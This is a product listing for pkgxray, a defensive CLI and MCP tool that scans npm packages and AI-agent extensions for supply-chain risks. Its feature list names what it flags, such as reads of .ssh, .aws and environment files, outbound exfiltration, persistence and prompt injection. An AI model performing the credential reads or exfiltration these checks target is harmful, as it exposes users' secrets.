PitchHut logo
A zero-dependency tool for auditing AI extensions and npm packages.
Pitch

pkgxray is a local CLI tool designed to audit AI-agent extensions and npm packages for supply-chain risks. By conducting static scans and OSV vulnerability prechecks, it provides a safe and reliable way to evaluate code before installation, ensuring only safe and verified packages are used.

Description

pkgxray is a powerful local CLI and MCP server designed to assess the safety of AI coding-agent extensions, including Codex plugins and Claude Code extensions, as well as npm packages. This tool enables users to evaluate the security of these components by either providing evidence or retrieving real npm tarballs into a secure, sandboxed environment—ensuring that all analyses are conducted locally with zero dependencies on external systems.

Key Features

Evidence-Based Auditing

pkgxray employs a conservative approach, offering assessments based solely on verifiable metadata or source text. Each evaluation results in one of three conclusions:

  • safe: indicating no significant risk factors,
  • review: signifying incomplete evidence or capabilities that require human inspection,
  • block: highlighting serious concerns such as prompt injection, credential access, or other critical security indicators.

Comprehensive Risk Assessment

This tool effectively surfaces potential supply-chain risks before any code is executed on local machines. The specific vulnerabilities pkgxray detects include:

  • Common Vulnerabilities and Exposures (CVE): Automatically queries the Open Source Vulnerability (OSV) database for known issues, preventing the download of compromised packages. For example, running pkgxray guard npm:axios@1.7.7 can reveal and block 20+ published advisories without downloading any code.
  • Credential and Secret Exposure: Identifies attempts to access sensitive data such as .ssh, .aws, or environment variable files.
  • Exfiltration Techniques: Flags patterns associated with data leaks, including co-located environment writes and outbound network requests.
  • Persistence Mechanisms: Detects scripts that manipulate system settings or persistent storage.
  • Obfuscation and Execution Patterns: Identifies suspicious code constructs designed to hide malicious activities.
  • Prompt Injection Risks: Reviews hidden instructions that may aim to manipulate AI agents during operations.
  • Discrepancies Between npm and GitHub Sources: Highlights differences in files between the npm tarball and the GitHub repository, prompting further investigation.
  • Package Provenance Verification: Confirms that packages are linked to their claimed source repositories through npm's sigstore/SLSA attestations.

Fast and Secure

pkgxray ensures that packaging in sandboxed quarantine occurs rapidly, with decisions made in approximately one second per package. It does not execute installation scripts or any package code, thus minimizing risks associated with dependency installation.

User-Friendly Command-Line Interface (CLI)

The command-line interface enables users to audit evidence files, audit entire project lockfiles, or pre-screen extensions before utilization. Examples of command usage include:

# Audit supplied evidence
pkgxray --file examples/evidence.json

# Audit a whole project's lockfile
pkgxray audit package-lock.json

MCP Server Integration

pkgxray can interface seamlessly with any MCP-capable agent, providing a suite of functions for auditing and guarding package installations.

Performance Metrics

Notably efficient, pkgxray runs on every install, with measured execution times for popular packages. For instance, running the guard operation on express@4.21.0 takes approximately 1.4 seconds.

Cache Server

To enhance performance further, pkgxray supports a self-hostable cache server that consolidates traffic when auditing and guarding operations. This setup reduces redundant network requests across multiple CI/CD runners.

Local Development and Testing

With a structured development workflow, developers can test and build features easily using available npm scripts.

Overall, pkgxray emerges as an essential tool for developers and security analysts seeking to secure their environments against potential supply-chain vulnerabilities, all while maintaining a fast and efficient workflow.

0 comments

No comments yet.

Sign in to be the first to comment.